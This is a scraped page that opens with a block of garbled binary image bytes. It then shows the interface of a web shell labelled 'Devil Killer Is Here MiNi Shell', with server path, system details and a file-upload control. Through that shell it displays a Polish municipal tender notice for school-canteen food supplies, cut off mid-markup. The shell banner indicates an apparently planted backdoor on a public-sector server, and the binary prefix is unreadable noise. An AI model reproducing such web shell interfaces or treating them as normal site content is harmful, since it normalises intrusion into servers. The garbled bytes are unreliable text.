JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241203/0062987001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa produktów spożywczych do stołówki szkolnej w I połowie 2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wierzchosławice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660996</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">-</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wierzchosławice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(14) 631-90-30</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@wierzchoslawice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wierzchoslawice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa produktów spożywczych do stołówki szkolnej w I połowie 2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3674a9ff-6b7a-4212-8eea-cc320985a3c7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00629870</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00062328/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa produktów spożywczych do stołówki szkolnej w I połowie 2025 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3674a9ff-6b7a-4212-8eea-cc320985a3c7 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/ oraz poczta elektroniczna (nie dotyczy składania ofert): zp@wierzchoslawice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/><br/>2. Wykonawca przygotowuje ofertę przy pomocy Formularza ofertowego udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”.<br/><br/>3. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>4. Do oferty należy dołączyć Oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu oraz Formularze cenowe, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę.<br/><br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza), z tym że maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/><br/>6. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/><br/>7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności dalej &#34;KRI&#34;, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki (pliki z danymi mogą również zostać skompresowane za pomocą programu do kompresji plików, jednakże Zamawiający musi mieć możliwość rozpakowania plików za pomocą programów określonych ww. Rozporządzeniu).<br/><br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: a) w formatach danych określonych w ppkt 7 (i przekazuje się jako załącznik) , lub b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/><br/>9. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail: zp@wierzchoslawice.pl. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym.<br/><br/>10. Dokumenty zamówienia będą dostępne również pod adresem (po wybraniu odpowiedniego postępowania): https://bip.malopolska.pl/ugwierzchoslawice,m,430085,2024.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje znajdują się w pkt I.10 Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje znajdują się w pkt I.10 Specyfikacji Warunków Zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.9.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa ryb i mrożonek do stołówki szkolnej Szkoły Podstawowej im. 100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Filet z MAKRELI w sosie pomidorowym	120	szt.<br/>2. Tuńczyk w sosie własnym	120	szt.<br/>3. Morszczuk mrożony – kostka, nie mielone, 100%mięsa	150	kg<br/>4. Łosoś mrożony – kostka, nie mielone	150	kg<br/>5. Miruna - filet mrożony 600	kg<br/>6. Paluszki rybne z fileta nie mielone	240	kg<br/>7. Brokuł mrożony	180	kg<br/>8. Brukselka mrożona	60	kg<br/>9. Bukiet kwiatowy jarzyn mrożony	50	kg<br/>10. Dynia mrożona	100	kg<br/>11. Fasola szparagowa zielona mrożona	150	kg<br/>12. Fasola szparagowa żółta mrożona	250	kg<br/>13. Groszek mrożony	150	kg<br/>14. Jagoda leśna mrożona	60	kg<br/>15. Kalafior mrożony	300	kg<br/>16. Malina mrożona	200	kg<br/>17. Marchew z groszkiem mrożona	100	kg<br/>18. Mieszanka kompotowa mrożona	1200	kg<br/>19. Mini marchewka mrożona	100	kg<br/>20. Szpinak rozdrobniony mrożony	30	kg<br/>21. Śliwka węgierka bez pestek mrożona	50	kg<br/>22. Truskawka mrożona	220	kg<br/>23. Wiśnia drylowana mrożona	150	kg<br/>24. Włoszczyzna mrożona	120	kg<br/>25. Zupa jarzynowa mrożona	80	kg<br/><br/>Gotowość realizacji dostaw: w zależności od potrzeby (w dni robocze) w godz. 7.00 ÷ 10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e-mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15240000-2 - Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone</p> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15332100-5 - Przetworzone owoce</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa owoców i warzyw do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Arbuz	300	kg<br/>2. Awokado	100	szt.<br/>3. Banan	1000	kg<br/>4. Bakłażan	20	kg<br/>5. Borówka amerykańska	5	kg<br/>6. Brzoskwinia	50	kg<br/>7. Brzoskwinia ufo	20	kg<br/>8. Cytryna	100	kg<br/>9. Granat	60	szt.<br/>10. Gruszka	500	kg<br/>11. Jabłka	2000	kg<br/>12. Jabłko szara reneta	200	kg<br/>13. Kaki 20	szt.<br/>14. Kiwi	1000	szt.<br/>15. Mandarynka	160	kg<br/>16. Melon żółty	50	szt.<br/>17. Morela	30	kg<br/>18. Pomarańcza	400	kg<br/>19. Truskawka	200	kg<br/>20. Winogrona	40	kg<br/>21. Brokuły	50	szt.<br/>22. Burak młody z botwiną	80	szt.<br/>23. Buraki czerwone	350	kg<br/>24. Cebula	500	kg<br/>25. Cebula czerwona	30	kg<br/>26. Cebula młoda ze szczypiorkiem	30	szt.<br/>27. Cieciorka	20	kg<br/>28. Cukinia	100	kg<br/>29. Czosnek	220	szt.<br/>30. Fasola sucha	100	kg<br/>31. Kalafior	100	szt.<br/>32. Kalarepa	120	szt.<br/>33. Kapusta biała	150	kg<br/>34. Kapusta biała młoda	70	szt.<br/>35. Kapusta kiszona biała	250	kg<br/>36. Kapusta pekińska	200	szt.<br/>37. Kapusta włoska	100	szt.<br/>38. Kiełki różnych warzyw	20	szt.<br/>39. Koperek zielony	900	szt.<br/>40. Lubczyk świeży	350	szt.<br/>41. Marchew młoda	100	szt.<br/>42. Marchewka	1500	kg<br/>43. Ogórek kiszony	250	kg<br/>44. Ogórek szklarniowy	350	kg<br/>45. Ogórek gruntowy	50	kg<br/>46. Papryka czerwona	200	kg<br/>47. Papryka zielona	10	kg<br/>48. Papryka żółta	200	kg<br/>49. Pieczarki świeże	200	kg<br/>50. Pietruszka korzeń	550	kg<br/>51. Pietruszka młoda z nacią	50	szt.<br/>52. Pietruszka natka	700	szt.<br/>53. Pomidory koktajlowe różne odmiany	70	kg<br/>54. Pomidory różne odmiany	200	kg<br/>55. Pory	400	szt.<br/>56. Rzodkiewka	170	szt.<br/>57. Sałata zielona (różne odmiany)	250	szt.<br/>58. Sałata – mix 180g	150	op.<br/>59. Sałata – rukola 100g	150	op.<br/>60. Sałata – roszpunka 100g	150	op.<br/>61. Szpinak świeży 100g	100	op.<br/>62. Sałata – cykoria (zielona i czerwona/ 2szt. opak.)	50	op.<br/>63. Sałata rzymska (2szt. w opak.)	50	op.<br/>64. Seler korzeniowy	400	kg<br/>65. Seler młody z liśćmi	70	szt.<br/>66. Seler naciowy	100	szt.<br/>67. Soczewica czerwona i zielona	100	kg<br/>68. Susz z buraka czerwonego	300	szt.<br/>69. Szczypiorek	350	szt.<br/>70. Ziemniaki młode	2000	kg<br/>71. Ziemniaki	6000	kg<br/>72. Zioła świeże	100	szt.<br/>73. Zioła świeże - mięta (IV-X)	10	kg<br/>74. Zioła świeże - mięta (XI-III)	10	kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 7.00÷10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e-mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03222000-3 - Owoce i orzechy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03221000-6 - Warzywa</p> <p class="mb-0">15331000-7 - Warzywa przetworzone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa artykułów mleczarskich do stołówki szkolnej Szkoły Podstawowej<br/>im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/>Zakres:<br/>1. Jogurt grecki 9% 400g	50	szt.<br/>2. Jogurt naturalny 2% 400g	300	szt.<br/>3. Jogurt naturalny 180g (zwykły i b/laktozy)	100	szt.<br/>4. Jogurt naturalny wiadro 5kg	350	szt.<br/>5. Jogurt owocowy 150g (z laktozą i bez laktozy)	1500	szt.<br/>6. Jogurt pitny 150g (typu actimel, zwykły i b/laktozy) 1200	szt.<br/>7. Kefir 1l	100	szt.<br/>8. Kefir 250g	220	szt.<br/>9. Masło	2500	szt.<br/>10. Mleko bez laktozy 150	szt.<br/>11. Maślanka 1l	150	szt.<br/>12. Mleko UHT 2%	4000	szt.<br/>13. Parmezan 200g	200	szt.<br/>14. Ser Edamski	45	kg<br/>15. Ser Feta	100	szt.<br/>16. Ser Gouda	90	kg<br/>17. Ser Gouda bez laktozy 150g	30	szt.<br/>18. Ser na sernik wiaderko 1kg	320	szt.<br/>19. Ser topiony	200	szt.<br/>20. Serek homogenizowany 140g	1000	szt.<br/>21. Serek maskarpone	70	kg<br/>22. Serek mozzarella kulka	300	szt.<br/>23. Serek wiejski 580g	100	szt.<br/>24. Serek wiejski 200g bez laktozy	10	szt.<br/>25. Skyr naturalny i smakowy bez laktozy 150g	50	szt.<br/>26. Skyr naturalny i smakowy 150g	1500 szt.<br/>27. Śmietana 18% 1300	szt.<br/>28. Śmietana 18% bez laktozy	20	szt.<br/>29. Śmietana 12%	500	szt.<br/>30. Śmietana 12% bez laktozy	20	szt.<br/>31. Śmietana 30%	200	l<br/>32. Śmietana 36%	80	l<br/>33. Śmietana 12% słodka	30	l<br/>34. Śmietana 18%słodka	30	l<br/>35. Twaróg półtłusty bez laktozy 230g	50	szt.<br/>36. Twaróg półtłusty 200	kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 7.00÷10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e-mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15510000-6 - Mleko i śmietana</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15530000-2 - Masło</p> <p class="mb-0">15540000-5 - Produkty serowarskie</p> <p class="mb-0">15551000-5 - Jogurt i pozostałe przefermentowane przetwory mleczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span 